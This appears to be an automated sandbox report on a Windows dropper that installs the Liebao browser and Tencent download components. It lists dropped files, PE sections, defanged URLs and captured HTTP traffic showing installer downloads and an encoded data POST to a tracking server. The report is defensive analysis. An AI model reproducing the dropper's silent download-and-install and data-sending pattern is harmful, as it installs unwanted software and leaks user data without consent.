%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\pkw2.dat (772 bytes)
%Program Files%\liebao\2014522163323984_1\browserpacket.xml (178 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\chrome_touch_100_percent.pak (6399 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\knbctrl.dll (3109 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ManualUpgrade.exe (9449 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\resources.pak (45687 bytes)
%Documents and Settings%\%current user%\Desktop\毒霸网å€大全.lnk (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\config\kseeat.cfg (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\send_318.gz (238 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\trackers.dat (1760 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ksapi.sys (712 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\ceb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\Preferences_resintall (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\safepay_site.dat (19 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\tn.dat (1704 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecore.dat (327 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\AllSigns.ini (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfc000f.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\kui_en-US.pak (25 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksesscan.dll (7879 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\sqlite3.exe (5007 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\ljdfelebfnfpjclmmkljlnagcdkpfpdl\1.0\Cached Theme.pak (6363 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\zlib1.dll (1112 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\KPreferences (503 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb8009.ksg (5 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\uninst.exe (10202 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseexf.dat (107 bytes)
%Program Files%\liebao\liebao.exe (11518 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksepnf.dat (107 bytes)
%System%\drivers\knbdrv.sys (601 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\dlcore.dll (20026 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\pkw.dat (669 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb8003.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\checkvideo.dat (61 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb8008.vsg (264 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\d3dcompiler_46.dll (28052 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\localurl.db (3668 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\kadfilter.dll (5863 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\LegoIcon\lego.dat (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\MouseGesture.dll (8245 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\feature2.dat (23 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\libGLESv2.dll (5682 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\install_info.json (255 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\safepay.dat (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\install2_log.log (72726 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj101204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepac001.ksg (1844 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\third_party\baidu_hd_query.dll (3341 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztmc0000.psg (66 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\falset.psg (132 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\czb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\PepperFlash\pepflashplayer.dll (110917 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb7001.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kBUpdateHelper.dll (13747 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ffmpegsumo.dll (11323 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\kvipinter.dll (3811 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\猎豹安全æµÂÂ览器\猎豹安全æµÂÂ览器.lnk (632 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ksapi.dll (691 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb9008.vsg (264 bytes)
%System%\drivers\KNBDrv64.sys (601 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\hxb.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseescan.dll (4564 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfc000b.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\Logos.db (3769 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Local State (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvc0011.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ktoolupd.dll (2779 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\icbc.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj141203.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\liebao.exe (14580 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb6002.ksg (4 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipbb004.ksg (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btfb7001.fsg (264 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb0001.ksg (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\Allvinfo.ini (833 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseset.dat (229 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\srvpref.dat (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj051204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\zh-CN.pak (193 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\resource.dat (735 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\Bookmarks (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\d3dcompiler_43.dll (15709 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\false.ksg (888 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvc0019.vsg (264 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\ksais.dat (8 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\anti_injection2.dat (710 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\scom.dll (1596 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\libEGL.dll (1722 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kfcdetect.dll (7469 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\SecondaryTile.png (5 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\plugins\np-mswmp.dll (1724 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfb0005.fsg (288 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\uplive.dll (15007 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\sqlite.dll (1872 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvbb00d.vsg (270 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\signs.ini (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\tenpay.png (2 bytes)
%Program Files%\liebao\test_access (30 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\chrome_100_percent.pak (6387 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\cmb.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaearcha.dat (1358 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\gdeploy.dat (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb9002.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\gdb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaextend.dat (106 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\upgrade.dll (9080 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecoref.dat (106 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipba004.ksg (7 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecorea.dat (173 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\kaxhlp.dll (4594 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\adb_easylist.dat (7386 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\knbdrv.sys (1326 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\webresource.dat (7712 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\liebao.dll (210497 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\TNProxy.dll (5849 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\liebao.ico (30 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\switchcore.db (7386 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\nffflelpnjalbndohecponhmlcihbgeo\1.0\Cached Theme.pak (1610 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\knbcenter.exe (4415 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\unionpay.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\DownloadProxy.dll (4458 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb0002.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\kwnp.dat (23 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\master_preferences (557 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\Tencentdl.exe (8880 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\sdb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipc0003.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\cyui.exe (3249 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\safesearch_safe.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksbwdt.ini (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btvb7002.vsg (294 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\DesktopTips.exe (7305 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\kui_zh-CN.pak (24 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecorem.dat (97 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\wd.dat (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btfc2009.psg (92 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb7004.ksg (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\DownloadProxyPS.dll (1806 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\猎豹安全æµÂÂ览器.lnk (652 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\cysvc.dll (6685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0liebao.exe (3750 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ÊÖ»úºäÕ¨»ú.exe (12288 bytes)
%Program Files%\liebao\4.5.34.6725\Data\expand_safepay.dat (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\uproperty.db (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\uproperty.db-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\upgrade\manager.log (455 bytes)
%Program Files%\liebao\4.5.34.6725\log\kmctrl.log (1537 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\upgrade\cleanup.log (1064 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\LOG (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\2.tmp (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\MANIFEST-000001 (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\MANIFEST-000002 (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\000002.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\boot_setup.pack.tmp (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\send_5ac.gz (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe (365108 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\boot_setup.pack.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe.pack.fd (9216408 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe.pack.fd.cfg (3656 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\dlcore.dll (14022 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\Tencentdl.exe (6841 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\extract.dll (2105 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\DownloadProxyPS.dll (601 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\InstallInfo.xml (25 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\tnproxy.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp\setup.bat (350 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp\down_s_66_82685.exe (5547 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: ????????
Product Name:
Product Version: 1.0.0.0
Legal Copyright: ????? ?????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????????????
Comments: ??????????(http://www.eyuyan.com)
Language: Language Neutral
Company Name: ????????Product Name: Product Version: 1.0.0.0Legal Copyright: ????? ?????????Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: ?????????????Comments: ??????????(http://www.eyuyan.com)Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 40132 | 40448 | 4.51726 | 4b3aeb2fc3b7b21ea3fdd5ad16a9ddf5 |
DATA | 45056 | 15632 | 15872 | 5.26127 | 1fb0fcf0a8c302fd1e7df6150f434d7e |
BSS | 61440 | 1825 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 65536 | 1730 | 2048 | 2.91217 | 9e9581a6aeb1c6de49e8280941f8bb34 |
.tls | 69632 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 73728 | 24 | 512 | 0.142404 | 996c4942e3a4d2795a22f3ace698d094 |
.reloc | 77824 | 1792 | 2048 | 4.24404 | d645c969d7346a611453d5e9e94c66f4 |
.rsrc | 81920 | 2630444 | 2630656 | 5.53486 | 0aaa3ad251a10f1f12ad7ae8e034fabc |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://lbdata.tj.ijinshan.com/data/ | 114.112.93.201 |
hxxp://lbdl.union.ijinshan.com/?pid=66&spid=82685&date=1400765523 | 114.112.93.101 |
hxxp://lbdl.union.ijinshan.com/liebao/66_82685.pack | 114.112.93.101 |
hxxp://lbdl.union.ijinshan.com/liebao/66_0.pack | 114.112.93.101 |
hxxp://tf01.dlmix.glb0.lxdns.com/liebao/pack/ksbInstaller_6725_66_0.pack | |
hxxp://d.union.ijinshan.com/liebao/pack/ksbInstaller_6725_66_0.pack | 8.37.234.15 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /liebao/pack/ksbInstaller_6725_66_0.pack HTTP/1.1
Range: bytes=11728801-
Pragma: no-cache
Cache-Control: no-cache
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.8888.8888;)
Host: d.union.ijinshan.com
HTTP/1.0 206 Partial Content
Date: Thu, 22 May 2014 13:32:05 GMT
Server: Tengine/1.5.2
Content-Type: application/octet-stream
Last-Modified: Thu, 09 Jan 2014 09:24:45 GMT
Accept-Ranges: bytes
Content-Range: bytes 11728801-46915205/46915206
Content-Length: 35186405
X-Cache: HIT from cache.51cdn.com
Via: 1.0 jg9:38080 (Cdn Cache Server V2.0)
Connection: close
q..../d.N....Wj;8`...h.4Z...]w.=..=.Ibb..'u4.3F..HK.!.s...5...l....y....._=$$...q...#.auK".T...........@......PH.Obp..V;...D..W.O$a..?O>..`-.K..F ....pg..E..9$..(..!@.T.u.....v...|hS...ww....f....2.v1.4x.-.2..R.un......K@.(....F0.......I..&....g.X ..]..F...M.\..S..QR.K.!...F..r.<(..Q.y^.......wK..P.^...Q.L...n4.....mfT......p.]um.9.|..m..".......,..S.o...=..Z.......%...H.'.Ss.h.....}._&40.7...8.A.2sj.......pH._X....E .....x...D.......n.....T.y.}.....D.G....Y..QY.X..B..v.N)'/.2I.........]C.i8.......~..A...KKY.]x......~K..1".?...`}?.....mu.i...,..kz3.%...Hs16....f.L:...N.g@...wd...o............$MM<..C.4 .d.S.......r.`=D.`..u..$!.OwL..l....$.09F.ko7..|G......m..(}..6q.0:%.."...W.....-.%w...8......F..X....&uA...zg)n......Y.=..M%. .....M.V~.......s.b..........r..9l...$..F.t0.pnW...*..N..3..B..3P.P...w.JL...z.7..l.QV..I1?....h....Ob1.eS..[...`.....z .d&......P8u....h.N.En.S........34.Q..F..m...FsTq_.t~.-.j......dEk....g..sa/.%_..:}_...17t..>.....0.......T....X.TG:........x.k..h.w..x.J..2.8#.a.....e@3..NzE.A...0..F3#Y..c..CD..;=Z.....4. ..3] qg...xdo.X....U...G.yD..y..b...u.........X.#...u../.hL#.1)n...u;....\.fd.u..Jv.2.bP..>...n<..j...&cx.......&zJ...f.?k.dz......n`.%..#...y.k.....M....b.....O.E..e#..jd..-.0Z V..a 4...c.L..O..DC.C.W#H.~p.W....*.R..E.5...j#>Vt.....C.%v}...H.S...U.6piM)..DB.....f.....hg.f$.....e..U.|._x...Yn....`JB.Q.M~.@04Ot`ns...ue.TE\.R.. .].........:.QF|...S2.......5I.6....@.c[..Hk.....g..'...*...(C{A.R...G.w.9..\...`O...i.....9P.......#.S....3<2.M^.....a.... >.x=.....}.
<<
<<< skipped >>>
GET /liebao/pack/ksbInstaller_6725_66_0.pack HTTP/1.1
Range: bytes=35186403-
Pragma: no-cache
Cache-Control: no-cache
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.8888.8888;)
Host: d.union.ijinshan.com
HTTP/1.0 206 Partial Content
Date: Thu, 22 May 2014 13:32:05 GMT
Server: Tengine/1.5.2
Content-Type: application/octet-stream
Last-Modified: Thu, 09 Jan 2014 09:24:45 GMT
Accept-Ranges: bytes
Content-Range: bytes 35186403-46915205/46915206
Content-Length: 11728803
X-Cache: HIT from cache.51cdn.com
Via: 1.0 jg9:38080 (Cdn Cache Server V2.0)
Connection: close
._....M....Z...o\..OBD..CT.s.....n7...;e. .H..m$.._,.......s7..Z..F...Z?../..^42'x.9.3.:.A.T...N...2?u......4...woT...;...~.4..NC.....c..q.i-...3.F.sHGZ.c...q[a..c.....@..u..Z-..".L0C{.5.....,.12.<&v...e.^"....C..po.".LO...9.i.pf.F..4..r7w.9.)....J.8..i.d..;..uA.kup.'"p]..~.'u..$... /].0....@.>..y.ws..k.|..H......G...-E..O9.*.... .V6.%.4....o...&.0"H.{``..<A..}...,.7E.............Q......a...........6.~..R.`\q\m.X=..I...D]..........n....!V.q...Q...bZ...9../.o....L.xT.@BI.)8....,.{... .ea......e....3..:..f&..'..p(.o......\..$..M..........p...h.r......c\#..fj..).....g......)#.?...4(....#...qU.........e...`..O.....4Y..KJ....|................\;..Z..F./.d......Qa.{@v....H.w'.V....8`.-..v.....;)w....q.......EG..'...../.9V...O,....M...%...`66.t.`s..:.ZTr.w.!. .1`#....y..U..<g.Joo.....`)......}e%.h..-{:#.....h..Wo......A8.B.nA....:......M.n...|.U..}....6*O.G..r..E..E{...c.[5O...1Z@....do....;d.~_^..3..ZY.....kT....{..3.....kc...Qj7#..E..Y......=-.zv.b.<...Nr..?.3_.j.[.f..........$..h0.:..(o.....}D...Y'6.E.~.....[....!...T.....".xb..u.m.N.....{So....).T.*.i....?.x,.....9.N..<..2#..]~6.y........w.1...}I:mf?=..Q.......PLJvAB|..X..m...p...u..)...F......... @.....8*......w..EY.....>..W#...W.^...l.R...4..........Aj..'...7>.....f....c.....!..s...h$`.O...b.....l*..b.JK.....\......i...T.V...Y.._c}H...ZRt...;FR?.0N..Z.j..^)Wo...'....O..../..-..p.:}.....{...0.E..r.p.U......K....h.....<.8e#U~..D<...C..|.......k.....a.".U....2)...i/.=.5tf.=g...H`..]o..N.a.>U...w9'&..-.Nw.H5(.W....t[.9P..*Pu.;..e[e..=
<<
<<< skipped >>>
GET /liebao/pack/ksbInstaller_6725_66_0.pack HTTP/1.1
Range: bytes=23457602-
Pragma: no-cache
Cache-Control: no-cache
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.8888.8888;)
Host: d.union.ijinshan.com
HTTP/1.0 206 Partial Content
Date: Thu, 22 May 2014 13:32:05 GMT
Server: Tengine/1.5.2
Content-Type: application/octet-stream
Last-Modified: Thu, 09 Jan 2014 09:24:45 GMT
Accept-Ranges: bytes
Content-Range: bytes 23457602-46915205/46915206
Content-Length: 23457604
X-Cache: HIT from cache.51cdn.com
Via: 1.0 jg9:38080 (Cdn Cache Server V2.0)
Connection: close
....x...0.`AH..e.,..'...0..Li...d=....;.......l~.$......b...k.EP. .Q,d0.............X.sU.m..4.... GH0..........LO{KF.gP<.......~................{.......rU..\5...@.#a...S0fZ[..ZV'1`=...n.H.P.]P.H.C...l(tVJ.M^.).. .pJC..^....1.4.8UE....l...0.O....W)v...z...`..t.;..z .........".p4OS.E..?..}C..*:T=.\....F*N.h.]....`h.K.?6.A..{..gD.K......Lg/(.d`...pB!..'W......Z."..>.....o..X.H8.....5& y....-.c...k..$.,.U....}yP.d.'.=4q....... !...%.....{4G.2"u.!..3F..n%}._4..k.Zcj....2.._;-.d..7...Q.X..,.&?[..0.....G&...M..,.q&.D.wS........`........D.y..:.PE.v=....$........ hi.?...}.3.....TsFE.5..S..'..j.)............}.jL...*.t.............;|~.K..y.."m.1...;.H....x.4..).. w/...D.~....4M.........D...SY#q.....U.Z...iw.G.i..G.%........k[L...m._.$.Hsd|..........R&...`.^.9..|Xq.\....qn&_Y^..aL.<3..YS./....,P._.=........x..MH......?H<.w*..^....l"}#.B:...c>....t.G.'...3j..D....A...O.x.....=.m..i..z.. b!.....%.D .-Qb...YOd...K....`w9\x8{.........C...Q1....i...T....U./L......A.V.1.1.....:...%E.{.y.7.X..{...lJX.(m.#.ke.......=..K.....b.U...h....6?X..>..t.m..\|^.=......nH......}.q...8...r..D....#pR..l#-..2k......V..&.&.o.....#.T.9.D..n#....xR..9._.8........].03.fi0........x..]c_.^.{...$....Rd.Ps.~..b~C).0.L.......;i2..t..}.fS..>...8..... 7.....9...m..;g-.B?f.^ Gn..u.1}k.P..........N.\...YmMd..y.x..b........q.].. (..r....h.......9.i......."h]z....bc.].A...}......O...._...2b..V..-Up.......j} ..5....>........MVu..]......7...ZO.Dg.r.X.9.T..Nx...\:....%u....w.......Gsd..O........#..a...S..S...#..6..s......F...aPp_.3?..".s.
<<
<<< skipped >>>
POST /data/ HTTP/1.1
Connection: close
Cache-Control: no-cache
User-Agent: liebao
Host: lbdata.tj.ijinshan.com
Content-Length: 177
............A..0..... '.....(..Z..5....p.=..6..k.. ~Q.......x...6.<..K....@KH.!.&.Pt.\..&|.r..[F......b..a..QRr....#.9:...y!4.tU ...^.L..3.u...[m.B............................
HTTP/1.1 200 OK
Server: ngx_openresty/1.4.3.4
Date: Thu, 22 May 2014 13:32:00 GMT
Content-Type: text/plain
Content-Length: 35
Connection: close
[common]..result=1..time=1400765520..
GET /liebao/pack/ksbInstaller_6725_66_0.pack HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.8888.8888;)
Host: d.union.ijinshan.com
Connection: Close
HTTP/1.0 200 OK
Date: Thu, 22 May 2014 13:32:05 GMT
Server: Tengine/1.5.2
Content-Type: application/octet-stream
Last-Modified: Thu, 09 Jan 2014 09:24:45 GMT
Accept-Ranges: bytes
Content-Length: 46915206
X-Cache: HIT from cache.51cdn.com
Via: 1.0 jg9:38080 (Cdn Cache Server V2.0)
Connection: close
x...}|T..8~.%.M.d.L`..QW..1.....@6D!....DL...u....$V...U......Z_.-Z.<.mQ....`.^......h'.T. ....93w7.......~.;/g...s...3....... .....B... ....y:A....Y.....h..........-Y..................?oi...... .....C...8jT.M.q....7........{.#........};.6 ......>..]k.^.q.......}.../...p....iL.\...w.........F..y.........].......G.)..uiB.......^......._..,...tA.@ ..G..zAH.t,?.......~.#.^(ia........,....Ve..`..f!.m.p..}............g.e...1GE.Q.....F.)..'~..N.....o..L. ......VM\......p..=.{...g...zK&r0aJ.~Vf.."......L.,^&....7.....[.l.. ....F...=Y..........'.l..U..e..p.y?n...@....9..{T.....H...`.........V....C.&/i....2../H..........&.../...l....f.]..!|s.7>...y....9......B..I.......H?O...........On.7.l._..:3.<=*...A...yt./......b.(/....Ov....j.jH.m.......G.@>.......F....yC..B....h..tD..B....=...e..<._...R]yv].i.GK..jpH)....]....M..Jv.rl...cV2o(..5..4 ..8.PWI(R";EG.....bz.J.C.......j<GUW.`.6/......e.....H..=^.r=..e.:Rb.[....sc.]..7....Sg~[..X..6.=].......,7*w.......$..t].A...w...=.y..s}J.:.!..h{.a?.~j.U.I.U.....HK....j.*.i2|MvA.......t.....NGw....n...y]........Q......G..... ..%....o..;I.aoR...%z}..3..{.....E............g...*{H.Vcr}=..|.Py$Q.U..F..Se.Py.;....U5T.#.#j..m9t.l....xmWu`...../Ce...!.........Z:...s...E.L.3r.....rS.9u..U..H.g..jN.....g<...'..L.oB......WUnL.B.xG.iC. 